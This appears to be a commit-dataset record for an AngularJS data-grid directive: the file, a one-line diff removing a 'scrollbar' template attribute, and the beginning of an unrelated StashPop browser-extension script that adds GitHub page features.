scope.init({$ctrl: ctrl}); scope.$emit(scope.gridName + ':init', {$ctrl: ctrl}); } } } } ]) .run(["$templateCache", function($templateCache) { $templateCache.put("template/vision/grid/vision-grid.html", "<div class=\"row\">\n"+ " <div class=\"vs-grid col-sm-12\">\n"+ " <div class=\"header-footer\" ng-if=\"hasFooterBar()\">\n"+ " <div class=\"vs-header-bar\" ng-include=\"headerBar\" ng-style=\"getHeaderFooterStyle()\"></div>\n"+ " </div>\n"+ " <div class=\"fixed-table-container\" ng-style=\"styleContainer\" class=\"table table-bordered\" tabindex=\"0\" ng-keydown=\"onKeyDown($event)\" ng-keyup=\"onKeyUp($event)\">\n"+ " <div class=\"table-header\">\n"+ " <table class=\"table-bordered table-vision\">\n"+ " <thead>\n"+ " <tr>\n"+ " <th ng-repeat=\"column in columns track by $index\"\n"+ " class=\"vs-grid-column\"\n"+ " ng-show=\"column.visible\"\n"+ " ng-style=\"getColumnStyle(column, 'header')\"\n"+ " ng-class=\"{first: $first}\">\n"+ " <div ng-style=\"headerStyle\" ng-show=\"isHeaderRenderer(column)\" ng-include=\"column.headerRenderer\"></div>\n"+ " <div ng-style=\"headerStyle\" ng-show=\"!isHeaderRenderer(column)\">\n"+ " <span ng-show=\"!column.sortable\" ng-bind=\"column.headerText\"></span>\n"+ " <column-sort></column-sort>\n"+ " </div>\n"+ " </th>\n"+ " </tr>\n"+ " </thead>\n"+ " </table>\n"+ " </div>\n"+ " <div class=\"fixed-table-container-inner\" ng-style=\"styleContainerInner\">\n"+ " <div ng-style=\"viewPortStyle\" style=\"position: relative; display: block;\">\n"+ " <table class=\"table table-bordered table-vision\" ng-style=\"tablePortStyle\">\n"+ " <tbody>\n"+ " <!--tabindex=\"{{$parent.$parent.$index}}{{$index+1}}\"-->\n"+ " <tr ng-repeat-start=\"row in renderedProvider track by $index\"\n"+ " ng-init=\"row.item\"\n"+ " ng-class=\"{rendered:row.isRendered}\"\n"+ " ng-style=\"getRowStyle(row.item)\">\n"+ " <td ng-repeat=\"column in columns track by $index\"\n"+ " ng-show=\"column.visible\" \n"+ " ng-mousedown=\"selectItem(row.item, column)\"\n"+ " ng-dblclick=\"selectItemDblclick(row.item, column)\"\n"+ " ng-class=\"selectClass(row.item)\"\n"+ " vision-cell row-index=\"{{$parent.$index}}\" col-index=\"{{$index}}\"\n"+ " ng-style=\"getColumnStyle(column)\">\n"+ " <div ng-show=\"hasFocus($parent.$index, $index)\" tabindex=\"-1\"><input type=\"text\" grid-editor style=\"width: 100%\"></div>\n"+ " <span ng-show=\"!isItemRenderer(row.item, column) && !hasFocus($parent.$index, $index)\" ng-bind-html=\"getItem($parent.$index, row.item, column)\"></span>\n"+ " <div ng-show=\"isItemRenderer(row.item, column)\" ng-include=\"column.itemRenderer\"></div>\n"+ " </td>\n"+ " </tr>\n"+ " <tr class=\"actions text-left\" ng-show=\"row.expandRowOpened\" ng-repeat-end>\n"+ " <td ng-include=\"expandRow\" colspan=\"{{columns.length}}\" ></td>\n"+ " </tr>\n"+ " </tbody>\n"+ " </table>\n"+ " </div>\n"+ " </div>\n"+ " </div>\n"+ " <div class=\"header-footer\" ng-if=\"hasFooterBar()\">\n"+ " <div class=\"vs-footer-bar\" ng-include=\"footerBar\" ng-style=\"getHeaderFooterStyle()\"></div>\n"+ " </div>\n"+ " </div>\n"+ "</div>" ); $templateCache.put("template/vision/grid/column-sort.html", "<a ng-if=\"column.sortable\" ng-click=\"sortBy(column.fieldName)\">\n"+ " <span ng-bind=\"column.headerText\"></span>\n"+ " <i ng-class=\"selectSorterClass(column.fieldName)\"></i>\n"+ "</a>" ); $templateCache.put("template/vision/grid/expandColumnRenderer.html", "<a class=\"expand-row\" ng-click=\"openCloseExpandRow(item)\">\n" + " <i class=\"fa\" ng-class=\"{'fa-chevron-right': !item.expandRowOpened, 'fa-chevron-down': item.expandRowOpened}\"></i>\n" + "</a>" ); }]);
src/grid-directives.js
'use strict'; /* * angular-vision-grid * v1.0.0-rc2 * (c) 2014 VisionGrid Team http://vision-ti.com.br * License: MIT */ angular.module('vision.grid', ['vision.grid.util']) /** * Directive para ser utilizada pela coluna ao realizar o sort * Útil para ser utilizada dentro de um headerRenderer customizado */ .directive('columnSort', [function () { return { require: '^grid', restrict: 'E', templateUrl: 'template/vision/grid/column-sort.html' } }]) .directive('visionCell', [function(){ return { require: '^visionGrid', replace: 'A', link: function(scope, element, attrs, gridCtrl){ if (scope.column.editable){ var position = attrs.rowIndex + attrs.colIndex; scope.cells[position] = { rowIndex: parseInt(attrs.rowIndex), colIndex: parseInt(attrs.colIndex), element: element, column: scope.column }; } scope.hasFocus = function(rowIndex, colIndex){ return (String(rowIndex) + String(colIndex) == scope.cellIndex.current.position); }; } } }]) .directive('gridEditor', ['$compile', function ($compile) { return { require: '^visionGrid', replace: 'A', link: function (scope, element, attrs) { if (!attrs.ngModel){ element.attr('ng-model', 'row.item.' + scope.column.fieldName); $compile(element)(scope); } } }; }]) .directive('visionGrid', ['vsGridUtil', '$filter', '$timeout', '$window', '$animate', function (vsGridUtil, $filter, $timeout, $window, $animate) { return { restrict: 'E', replace: true, templateUrl: 'template/vision/grid/vision-grid.html', transclude: true, scope: { init: '&', provider: '=?', onSelect: '&', itemDoubleClick: '&', cellBlur: '&', height: '@', selectionMode: '@', headerHeight: '@', rowHeight: '@', rowColorFunction: '&', rowColorField: '@', scrollOffset: '@', headerBar: '@', footerBar: '@', expandRowUrl: '@', expandColumnHeader: '@', expandColumnRenderer: '@', toggleExpandRow: '=?', virtualScrollEnabled: '=?', minRows: '@' }, controller: ['$scope', '$element', '$attrs', function ($scope, $elment, $attrs) { this.nextCell = function(){ $scope.goToCell($scope.cellIndex.current.colIndex + 1); }; this.previousCell = function(){ $scope.goToCell($scope.cellIndex.current.colIndex - 1); }; /** * Disparado pelo grid column * @param column */ this.addColumn = function (column) { this.addColumnAt($scope.columns.length, column); }; /** * Adiciona uma coluna em uma posição específica * @param index * @param column */ this.addColumnAt = function (index, column) { if (!angular.isDefined(column.fieldName)) { throw 'When adding gridColumn, fieldName is required!'; } $scope.addColumnAt(index, column); }; /** * Retorna a coluna pelo fieldName * @param fieldName */ this.getColumnByFieldName = function (fieldName) { for (var i = 0; i < $scope.columns.length; i++) { if ($scope.columns[i].fieldName == fieldName) return $scope.columns[i]; } }; /** * Retorna a coluna pelo índice * @param $index * @returns {*} */ this.getColumn = function ($index) { return $scope.columns[$index]; }; /** * Retorna o array das colunas * @returns {Array} */ this.getColumns = function () { return $scope.columns; }; /** * Função para setar o provider manualmente no $scope da directive * @param provider */ this.setProvider = function (provider) { $scope.provider = provider; }; /** * Função para obter o item selecionado da grid * @return {Object} */ this.getSelectedItem = function () { return $scope.selectedItem; }; /** * Retorna a coluna selecionada * @returns {*|columnSelected|getData.columnSelected} */ this.getColumnSelected = function () { return $scope.columnSelected; }; //Update grid height and recalculate this.setHeight = function (value) { $scope.updateHeight(value); }; /** * Obtém o nome da grid */ this.getGridName = function () { return $scope.gridName; }; /** * Configura a expandRow * @param expandRowUrl */ this.setExpandRowUrl = function (expandRowUrl) { $scope.setExpandRowUrl(expandRowUrl); }; /** * Muda o outerScope padrão que é o scope.$parent * @param outerScope */ this.setOuterScope = function (outerScope) { $scope.outerScope = outerScope; }; }], link: function (scope, element, attrs, ctrl) { var userAgent = $window.navigator.userAgent.toLowerCase(); var isFirefox = userAgent.indexOf('firefox') > -1; var isOpera = userAgent.indexOf('opera') > -1; var commandKeyCode = isFirefox ? 224 : (isOpera ? 17 : 91 /* webkit */); scope.outerScope = scope.$parent; scope.cells = {}; scope.editableColumns = []; //Define se a expand-row será mantida aberta scope.toggleExpandRow = vsGridUtil.getDefined(scope.toggleExpandRow, true); scope.gridName = vsGridUtil.getDefined(attrs.name, 'grid'); //Cria uma referência do ctrl no scope do elemento parent angular.element(element[0].parentElement).scope()[scope.gridName] = ctrl; /** * Será a cópia do provider * Essencial para realizar o sort na lista para que o selectedIndex seja buscado pelo provider original * @type {Array} */ scope.gridProvider = []; /** * ng-repeat * @type {Array} */ scope.renderedProvider = []; scope.viewPortStyle = {}; scope.tablePortStyle = {}; scope.tablePortStyle.position = 'relative'; scope.columns = []; var minRows, headerHeight, height, rowHeight, viewPortHeight; // Define a quantidade mínima de linhas a serem exibidas na grid scope.minRows = vsGridUtil.getDefined(scope.minRows, '0'); minRows = Number(scope.minRows); //Seta o headerHeight scope.headerHeight = vsGridUtil.getDefined(scope.headerHeight, '30px'); headerHeight = Number(scope.headerHeight.replace('px', '')); scope.headerStyle = {}; scope.headerStyle.height = scope.headerHeight; scope.headerStyle.lineHeight = scope.headerHeight; // headerHeight attrs.rowHeight = vsGridUtil.getDefined(scope.rowHeight, '30px'); rowHeight = Number(attrs.rowHeight.replace('px', '')); //Altura da grid attrs.height = vsGridUtil.getDefined(attrs.height, '300px'); height = Number(attrs.height.replace('px', '')); scope.styleContainer = {}; scope.styleContainerInner = {}; if (scope.virtualScrollEnabled) { scope.styleContainer.height = attrs.height; scope.styleContainerInner.height = (height - headerHeight) + 'px'; } var innerContainer = element.find('.fixed-table-container-inner'); var headerBar = null, footerBar = null; var tableHeader = element.find('.table-header'); var spinner = element.find('#vs-grid-spinner'); var raw = innerContainer[0]; var rangeStart, rangeEnd; innerContainer.scroll(function (event) { //Header scroll(horizontal) if (headerBar == null && footerBar == null) { headerBar = element.find('.vs-header-bar'); footerBar = element.find('.vs-footer-bar'); } else { headerBar.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); footerBar.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); } tableHeader.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); if (scope.virtualScrollEnabled) { //Virtual scroll(vertical) rangeStart = Math.ceil(raw.scrollTop / rowHeight); rangeEnd = Math.ceil((raw.scrollTop + raw.offsetHeight) / rowHeight); if (raw.scrollTop + raw.offsetHeight <= viewPortHeight) { scope.tablePortStyle.top = raw.scrollTop + 'px'; scope.renderProvider(scope.gridProvider.slice(rangeStart, rangeEnd)); scope.$digest(); } } }); /** * Change scroll position to rowIndex */ scope.scrollToRowIndex = function(rowIndex){ $timeout(function(){ if (rowIndex < rangeStart){ raw.scrollTop -= rowHeight; innerContainer.scroll(); }else if (rowIndex + 1 > rangeEnd){ raw.scrollTop += rowHeight; innerContainer.scroll(); } }); }; /** * Return virtual rows lenght to render rows with no-data, for visual aspect * @returns {number} */ var getVirtualRowsLength = function () { return scope.virtualScrollEnabled ? Math.ceil((height - headerHeight) / rowHeight) : scope.gridProvider.length; }; /** * Update virtual scroll height * @param height */ scope.updateHeight = function (value) { height = value; scope.styleContainer.height = height + 'px'; scope.styleContainerInner.height = (height - headerHeight) + 'px'; scope.renderProvider(scope.gridProvider, getVirtualRowsLength()); scope.$apply(); }; /** * Adiciona as rows a serem renderizadas */ scope.renderProvider = function (rows, length) { if (length == undefined) { length = rows.length; } scope.renderedProvider.length = length; for (var i = 0; i < length || i < minRows; i++) { if (angular.isDefined(rows[i])) { scope.renderedProvider[i] = {item:rows[i]}; } else { scope.renderedProvider[i] = {}; } } }; /** * Atualiza o gridProvider */ scope.$watchCollection('provider', function (newValue, oldValue) { clearSelection(); //Realiza a cópia do provider scope.gridProvider = []; if (scope.provider != null && scope.provider != undefined) angular.extend(scope.gridProvider, scope.provider); //Faz o cálculo do height da viewPort para virtual scroll if (scope.virtualScrollEnabled && angular.isDefined(newValue) && newValue.length > 0) { viewPortHeight = newValue.length * rowHeight; scope.viewPortStyle.height = viewPortHeight + 'px'; } if (oldValue == undefined || newValue == undefined || newValue.length != oldValue.length) { $timeout(function () { raw.scrollTop = 0; innerContainer.scroll(); }); } }); /** * Atualiza o renderedProvider */ scope.$watchCollection('gridProvider', function (value) { //Desenha as rows (desenha rows virtuais sem dados no caso de virtualScrollEnabled) scope.renderProvider(scope.gridProvider, getVirtualRowsLength()); rangeStart = 0; rangeEnd = scope.renderedProvider.length; }); /** * Configura o style da row * @param item * @returns {{}} */ scope.getRowStyle = function (item) { var rowStyle = {}; rowStyle.height = scope.rowHeight; //Desenha a cor de fundo da row por uma propriedade de um item do provider if (angular.isDefined(scope.rowColorField)) { var color = vsGridUtil.evaluate(item, scope.rowColorField); if (angular.isDefined(color)) rowStyle.backgroundColor = color; } //Desenha a cor de fundo de acordo com uma function if (angular.isDefined(attrs.rowColorFunction)) { var color = scope.rowColorFunction({$item: item}); if (angular.isDefined(color)) rowStyle.backgroundColor = color; } return rowStyle; }; /** * Configura o style da coluna * @param column */ scope.getColumnStyle = function (column, position) { var columnStyle = {}; if (position == 'header') { columnStyle.textAlign = column.headerTextAlign; } else { columnStyle.textAlign = column.textAlign; } if (angular.isDefined(column.width)) columnStyle.width = column.width; else { columnStyle.minWidth = '80px'; columnStyle.width = 'auto !important'; } return columnStyle; }; /** * Adiciona a coluna * Private function * @param index * @param column */ scope.addColumnAt = function (index, column) { column.index = index; if (column instanceof GridColumnDecimal && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatDecimal; } if (column instanceof GridColumnDate && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatDate; } if (column instanceof GridColumnEnum && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatEnum; } if (column.editable) scope.editableColumns.push(column); /** * Evento disparado no $rootScope para configuração * de labelFunction de implementações de outras colunas */ scope.$emit('grid:addColumn', column); scope.columns.splice(index, 0, column); }; /** * Retorna a String do item para exibir na grid * @param item * @param column * @returns {*} */ scope.getItem = function ($index, item, column) { var valueOf; if (angular.isFunction(column.labelFunction)) { valueOf = column.labelFunction(item, column, $index); } else valueOf = vsGridUtil.evaluate(item, column.fieldName); return valueOf != undefined ? valueOf.toString() : ''; }; /** * Verifica se foi informado o headerRenderer na coluna * @param column * @returns {boolean|*} */ scope.isHeaderRenderer = function (column) { return angular.isDefined(column.headerRenderer); }; /** * Verifica se tem um itemRenderer informado * @param column * @returns {boolean} */ scope.isItemRenderer = function (item, column) { return angular.isDefined(column.itemRenderer); }; /** * Dispara o double-click */ scope.selectItemDblclick = function (item, column) { scope.selectItem(item, column); if (attrs.itemDoubleClick) { scope.itemDoubleClick({$data: scope.getData()}); } scope.$emit(scope.gridName + ':itemDoubleClick', scope.getData()); }; /** * Seta o selectedItem * @param item */ scope.selectedItems = []; attrs.selectionMode = vsGridUtil.getDefined(scope.selectionMode, 'single'); var begin, end, virtualIndex, lastIndex = -1; scope.selectItem = function (item, column) { scope.columnSelected = column; if (!angular.isDefined(item)) return; scope.selectedIndex = scope.provider.indexOf(item); virtualIndex = scope.gridProvider.indexOf(item); scope.selectedItem = item; if (scope.shiftKey) { if (lastIndex == -1) { lastIndex = virtualIndex; scope.selectedItems = []; } if (lastIndex < virtualIndex) { begin = lastIndex; end = virtualIndex; } else { begin = virtualIndex; end = lastIndex; } scope.selectedItems = scope.gridProvider.slice(begin, end + 1); } else if (scope.ctrlKey) { if (scope.selectedItems.indexOf(item) == -1) scope.selectedItems.push(item); else { var indexOf = scope.selectedItems.indexOf(item); scope.selectedItems.splice(indexOf, 1); } lastIndex = virtualIndex; } else { lastIndex = virtualIndex; scope.selectedItems = [item]; } if (angular.isDefined(attrs.onSelect)) { //Callback function para o item selecionado scope.onSelect({$data: scope.getData()}); } scope.$emit(scope.gridName + ':onSelect', scope.getData()); }; /** * Object com a informação do item selecionado na grid * @returns {{}} */ scope.getData = function () { var $data = {}; $data.selectedIndex = scope.selectedIndex; $data.selectedItem = scope.selectedItem; $data.columnSelected = scope.columnSelected; $data.selectedItems = scope.selectedItems; return $data; }; /** * Limpa a seleção * @private */ var clearSelection = function () { scope.selectedItems = []; scope.selectedItem = null; scope.selectedIndex = null; scope.selectedColumn = null; }; /** * Ao clicar em um item atribui o class de seleção * @param item * @returns {string} */ scope.selectClass = function (item) { if ((item == scope.selectedItem && scope.selectionMode == 'single') || (scope.selectedItems.indexOf(item) != -1 && scope.selectionMode == 'multiple')) { return 'selected-item'; } else return ''; }; /** * onKeyDown * @param $event */ scope.onKeyDown = function ($event) { if ($event.keyCode == 9) { if ($event.shiftKey){ ctrl.previousCell(); }else{ ctrl.nextCell(); } $event.preventDefault(); } if ($event.keyCode == 38 || $event.keyCode == 40) { if (virtualIndex == undefined) virtualIndex = -1; //up key if ($event.keyCode == 38) { if (virtualIndex < 0) { virtualIndex = 0 } else if (virtualIndex > 0) { virtualIndex--; } } //down key if ($event.keyCode == 40) { if (virtualIndex > scope.gridProvider.length) { virtualIndex = scope.gridProvider.length; } else if (virtualIndex < scope.gridProvider.length) { virtualIndex++; } } scope.selectItem(scope.gridProvider[virtualIndex], scope.selectedColumn); scope.scrollToRowIndex(virtualIndex); } if (scope.selectionMode == 'multiple') { scope.shiftKey = $event.shiftKey; scope.ctrlKey = $event.ctrlKey || $event.keyCode == commandKeyCode; } scope.$emit(scope.gridName + ':onKeyDown', $event); }; scope.cellIndex = {current:{rowIndex: -1, colIndex: -1, position: '-1'}}; scope.cellIndex.old = scope.cellIndex.current; scope.goToCell = function(colIndex){ if (virtualIndex == undefined) virtualIndex = -1; if (scope.cellIndex.current.rowIndex == -1){ scope.cellIndex.current.rowIndex = 0; scope.cellIndex.current.colIndex = 0; } var rowIndex = scope.cellIndex.current.rowIndex; if (colIndex < 0){ virtualIndex--; rowIndex--; colIndex = scope.editableColumns[scope.editableColumns.length - 1].index; }else if (colIndex > scope.editableColumns.length -1){ virtualIndex++; rowIndex++; colIndex = scope.editableColumns[0].index; } var position = String(rowIndex) + String(scope.editableColumns[colIndex].index); var cell = scope.cells[position]; if (cell){ if (attrs.cellBlur && scope.cellIndex.old != scope.cellIndex.current){ scope.cellBlur({ $data:{ oldCell: scope.cells[scope.cellIndex.old.position], cell: scope.cells[scope.cellIndex.current.position], selectedItem: scope.getData().selectedItem } }); } scope.cellIndex.old = scope.cellIndex.current; scope.cellIndex.current.rowIndex = rowIndex; scope.cellIndex.current.colIndex = colIndex; scope.cellIndex.current.position = position; $timeout(function(){ angular.element(cell.element).find('input')[0].focus(); }); }else if (rowIndex > scope.renderedProvider.length - 1){ scope.scrollToRowIndex(virtualIndex); scope.goToCell(0); } }; /** * onKeyUp * @param $event */ scope.onKeyUp = function ($event) { if (scope.selectionMode == 'multiple') { scope.shiftKey = $event.shiftKey; scope.ctrlKey = $event.ctrlKey; if ($event.keyCode == commandKeyCode) scope.ctrlKey = false; } scope.$emit(scope.gridName + ':onKeyUp', $event); }; //Sort object scope.sort = { sortingField: 'id', reverse: false }; /** * class style do sorter * @param fieldName * @returns {string} */ scope.selectSorterClass = function (fieldName) { if (fieldName == scope.sort.sortingField) { return ('glyphicon glyphicon-chevron-' + ((scope.sort.reverse) ? 'down' : 'up')); } else { return ''; } }; /** * Realiza o sort * @param newSortingField */ scope.sortBy = function (newSortingField) { if (scope.sort.sortingField == newSortingField) { scope.sort.reverse = !scope.sort.reverse; } scope.sort.sortingField = newSortingField; scope.gridProvider = $filter('orderBy')(scope.provider, scope.sort.sortingField, scope.sort.reverse); }; /** * Verifica se tem headerBar * @returns {boolean|*} */ scope.hasHeaderBar = function () { return angular.isDefined(attrs.headerBar); }; /** * Verifica se tem footerBar * @returns {boolean|*} */ scope.hasFooterBar = function () { return angular.isDefined(attrs.footerBar); }; /** * Style header-footer */ var headerFooterStyle = {}; scope.getHeaderFooterStyle = function () { headerFooterStyle.width = innerContainer[0].scrollWidth; return headerFooterStyle; }; //Função disparada pelo expandColumnRenderer scope.openCloseExpandRow = function (item) { item.expandRowOpened = !item.expandRowOpened; if (scope.toggleExpandRow) { angular.forEach(scope.renderedProvider, function (value, index) { if (value != item) value.expandRowOpened = false; }); } }; scope.expandRow = undefined; /** * Configura a expandRow */ scope.setExpandRowUrl = function (expandRowUrl) { scope.expandRow = expandRowUrl; attrs.expandColumnRenderer = vsGridUtil.getDefined(scope.expandColumnRenderer, 'template/vision/grid/expandColumnRenderer.html'); var expandColumn = new GridColumn(); expandColumn.fieldName = 'expandColumn'; expandColumn.width = '70px'; expandColumn.textAlign = 'center'; expandColumn.itemRenderer = attrs.expandColumnRenderer; if (angular.isDefined(scope.expandColumnHeader)) { expandColumn.headerText = scope.expandColumnHeader; } scope.addColumnAt(0, expandColumn); }; if (angular.isDefined(scope.expandRowUrl)) scope.setExpandRowUrl(scope.expandRowUrl); /** * Dispara o método config para inicializar as colunas */ if (angular.isDefined(attrs.init)) { scope.init({$ctrl: ctrl}); scope.$emit(scope.gridName + ':init', {$ctrl: ctrl}); } } } } ]) .run(["$templateCache", function($templateCache) { $templateCache.put("template/vision/grid/vision-grid.html", "<div class=\"row\">\n"+ " <div class=\"vs-grid col-sm-12\">\n"+ " <div class=\"header-footer\" ng-if=\"hasFooterBar()\">\n"+ " <div class=\"vs-header-bar\" ng-include=\"headerBar\" ng-style=\"getHeaderFooterStyle()\"></div>\n"+ " </div>\n"+ " <div class=\"fixed-table-container\" ng-style=\"styleContainer\" class=\"table table-bordered\" tabindex=\"0\" ng-keydown=\"onKeyDown($event)\" ng-keyup=\"onKeyUp($event)\">\n"+ " <div class=\"table-header\">\n"+ " <table class=\"table-bordered table-vision\">\n"+ " <thead>\n"+ " <tr>\n"+ " <th ng-repeat=\"column in columns track by $index\"\n"+ " class=\"vs-grid-column\"\n"+ " ng-show=\"column.visible\"\n"+ " ng-style=\"getColumnStyle(column, 'header')\"\n"+ " ng-class=\"{first: $first}\">\n"+ " <div ng-style=\"headerStyle\" ng-show=\"isHeaderRenderer(column)\" ng-include=\"column.headerRenderer\"></div>\n"+ " <div ng-style=\"headerStyle\" ng-show=\"!isHeaderRenderer(column)\">\n"+ " <span ng-show=\"!column.sortable\" ng-bind=\"column.headerText\"></span>\n"+ " <column-sort></column-sort>\n"+ " </div>\n"+ " </th>\n"+ " </tr>\n"+ " </thead>\n"+ " </table>\n"+ " </div>\n"+ " <div class=\"fixed-table-container-inner\" scrollbar ng-style=\"styleContainerInner\">\n"+ " <div ng-style=\"viewPortStyle\" style=\"position: relative; display: block;\">\n"+ " <table class=\"table table-bordered table-vision\" ng-style=\"tablePortStyle\">\n"+ " <tbody>\n"+ " <!--tabindex=\"{{$parent.$parent.$index}}{{$index+1}}\"-->\n"+ " <tr ng-repeat-start=\"row in renderedProvider track by $index\"\n"+ " ng-init=\"row.item\"\n"+ " ng-class=\"{rendered:row.isRendered}\"\n"+ " ng-style=\"getRowStyle(row.item)\">\n"+ " <td ng-repeat=\"column in columns track by $index\"\n"+ " ng-show=\"column.visible\" \n"+ " ng-mousedown=\"selectItem(row.item, column)\"\n"+ " ng-dblclick=\"selectItemDblclick(row.item, column)\"\n"+ " ng-class=\"selectClass(row.item)\"\n"+ " vision-cell row-index=\"{{$parent.$index}}\" col-index=\"{{$index}}\"\n"+ " ng-style=\"getColumnStyle(column)\">\n"+ " <div ng-show=\"hasFocus($parent.$index, $index)\" tabindex=\"-1\"><input type=\"text\" grid-editor style=\"width: 100%\"></div>\n"+ " <span ng-show=\"!isItemRenderer(row.item, column) && !hasFocus($parent.$index, $index)\" ng-bind-html=\"getItem($parent.$index, row.item, column)\"></span>\n"+ " <div ng-show=\"isItemRenderer(row.item, column)\" ng-include=\"column.itemRenderer\"></div>\n"+ " </td>\n"+ " </tr>\n"+ " <tr class=\"actions text-left\" ng-show=\"row.expandRowOpened\" ng-repeat-end>\n"+ " <td ng-include=\"expandRow\" colspan=\"{{columns.length}}\" ></td>\n"+ " </tr>\n"+ " </tbody>\n"+ " </table>\n"+ " </div>\n"+ " </div>\n"+ " </div>\n"+ " <div class=\"header-footer\" ng-if=\"hasFooterBar()\">\n"+ " <div class=\"vs-footer-bar\" ng-include=\"footerBar\" ng-style=\"getHeaderFooterStyle()\"></div>\n"+ " </div>\n"+ " </div>\n"+ "</div>" ); $templateCache.put("template/vision/grid/column-sort.html", "<a ng-if=\"column.sortable\" ng-click=\"sortBy(column.fieldName)\">\n"+ " <span ng-bind=\"column.headerText\"></span>\n"+ " <i ng-class=\"selectSorterClass(column.fieldName)\"></i>\n"+ "</a>" ); $templateCache.put("template/vision/grid/expandColumnRenderer.html", "<a class=\"expand-row\" ng-click=\"openCloseExpandRow(item)\">\n" + " <i class=\"fa\" ng-class=\"{'fa-chevron-right': !item.expandRowOpened, 'fa-chevron-down': item.expandRowOpened}\"></i>\n" + "</a>" ); }]);
Update grid-directives.js
src/grid-directives.js
Update grid-directives.js
<ide><path>rc/grid-directives.js <ide> " </thead>\n"+ <ide> " </table>\n"+ <ide> " </div>\n"+ <del> " <div class=\"fixed-table-container-inner\" scrollbar ng-style=\"styleContainerInner\">\n"+ <add> " <div class=\"fixed-table-container-inner\" ng-style=\"styleContainerInner\">\n"+ <ide> " <div ng-style=\"viewPortStyle\" style=\"position: relative; display: block;\">\n"+ <ide> " <table class=\"table table-bordered table-vision\" ng-style=\"tablePortStyle\">\n"+ <ide> " <tbody>\n"+
JavaScript
mit
375b4bf575af4df82cbacdebcb6ad43a02203b00
0
dpoeschl/StashPop,dpoeschl/StashPop
// Constants var stashPopClassName = "stashPop"; var jenkinsReloadableInfoClassName = "jenkinsReloadableInfo"; // This list must match the list specified in reload() var option_emailIssuesList = "emailIssuesList"; var option_emailIssue = "emailIssue"; var option_emailPullRequestList = "emailPullRequestList"; var option_emailPullRequest = "emailPullRequest"; var option_jenkinsOpenDetailsLinksInNewTab = "jenkinsOpenDetailsLinksInNewTab"; var option_jenkinsShowRunTime = "jenkinsShowRunTime"; var option_jenkinsShowFailureIndications = "jenkinsShowFailureIndications"; var option_jenkinsShowTestFailures = "jenkinsShowTestFailures"; var option_jenkinsShowBugFilingButton = "jenkinsShowBugFilingButton"; var option_jenkinsShowRetestButton = "jenkinsShowRetestButton"; var option_jenkinsOfferInlineFailuresOnPRList = "jenkinsOfferInlineFailuresOnPRList"; var option_issueCreationRouting = "issueCreationRouting"; var option_nonDefaultTestInfo = "nonDefaultTestInfo"; var option_defaultIssueLabels = "defaultIssueLabels"; var option_testRerunText = "testRerunText"; var option_showCodeReviewInfo = "showCodeReviewInfo"; var option_codeReviewOptions = "codeReviewOptions"; document.addEventListener("DOMContentLoaded", function () { "use strict"; log("DOMContentLoaded"); try { initialSetup(); reload(true); } catch (err) { logfailure(err); } }); function initialSetup() { log("Performing initial setup"); configureTooltips(); var s = document.createElement('script'); s.src = chrome.extension.getURL('scripts/injectedcode.js'); s.onload = function () { this.parentNode.removeChild(this); }; (document.head || document.documentElement).appendChild(s); document.addEventListener('_pjax:end', function () { log("Detected page data changed."); reload(false); }, false); } function configureTooltips() { log("Configuring tooltips"); $(document).tooltip({ items: "[stashpop-title]", track: false, close: function (evt, ui) { $(document).data("ui-tooltip").liveRegion.children().remove(); }, position: { my: "left+5 top+5", at: "left bottom" }, tooltipClass: "ui-tooltip", show: "slideDown", hide: false, content: function () { var element = $(this); if (element.is("[stashpop-title]")) { var text = element.attr("stashpop-title"); return text; // "<b>What up?</b> Yo?"; } } }); } function reload(firstRun) { resetGlobals(); log("Remove all StashPop elements and reload data"); $('.' + stashPopClassName).remove(); chrome.runtime.sendMessage({ method: "getSettings", keys: [ option_emailIssuesList, option_emailIssue, option_emailPullRequestList, option_emailPullRequest, option_jenkinsOpenDetailsLinksInNewTab, option_jenkinsShowRunTime, option_jenkinsShowFailureIndications, option_jenkinsShowTestFailures, option_jenkinsShowBugFilingButton, option_jenkinsShowRetestButton, option_jenkinsOfferInlineFailuresOnPRList, option_issueCreationRouting, option_nonDefaultTestInfo, option_defaultIssueLabels, option_testRerunText, option_showCodeReviewInfo, option_codeReviewOptions ] }, function (currentSettings) { if (isIndividualItemPage) { var title = document.getElementsByClassName("js-issue-title")[0].innerHTML; var number = document.getElementsByClassName("gh-header-number")[0].innerHTML.substring(1); // https://github.com/dotnet/roslyn/pull/5786 var isPull = postDomainUrlParts[2] == "pull"; if (isPull && currentSettings[option_showCodeReviewInfo]) { var bestCodeReviewOptions = getBestCodeReviewOptions(currentSettings[option_codeReviewOptions]); observeCommentFieldChanges(bestCodeReviewOptions); addCodeReviewSummaryAndButtons(bestCodeReviewOptions); } addButtonsToIndividualItemPage(title, number, isPull, currentSettings); makeBuildStatusWindowsBig(); if (currentSettings[option_jenkinsOpenDetailsLinksInNewTab]) { openJenkinsDetailsInNewTab(currentSettings); } } if (isListPage) { // https://github.com/dotnet/roslyn/pulls/dpoeschl // https://github.com/pulls var isPull = postDomainUrlParts[2] == "pulls" || (currentPageOrg == null && postDomainUrlParts[0] == "pulls"); addButtonsToListPage(isPull, currentSettings); } reloadJenkins(firstRun, currentSettings); } ); } function observeCommentFieldChanges(codeReviewOptions) { var splitCodeOptions = codeReviewOptions.split(";"); var positiveIndicatorsString = splitCodeOptions[1].trim(); var negativeIndicatorsString = splitCodeOptions[2].trim(); var testedIndicatorsString = splitCodeOptions[3].trim(); if (positiveIndicatorsString.length == 0 && negativeIndicatorsString.length == 0 && testedIndicatorsString.length == 0) { log("Empty code review options. Bail.") return; } var positiveIndicators = positiveIndicatorsString.split(","); var negativeIndicators = negativeIndicatorsString.split(","); var testedIndicators = testedIndicatorsString.split(","); var target = document.querySelector('#new_comment_field'); var observer = new MutationObserver(function (mutations) { mutations.forEach(function (mutation) { var text = target.value; for (var c = 0; c < positiveIndicators.length; c++) { if (text.indexOf(positiveIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#77ff77"; }); return; } } for (var c = 0; c < negativeIndicators.length; c++) { if (text.indexOf(negativeIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#ff7777"; }); return; } } for (var c = 0; c < testedIndicators.length; c++) { if (text.indexOf(testedIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { 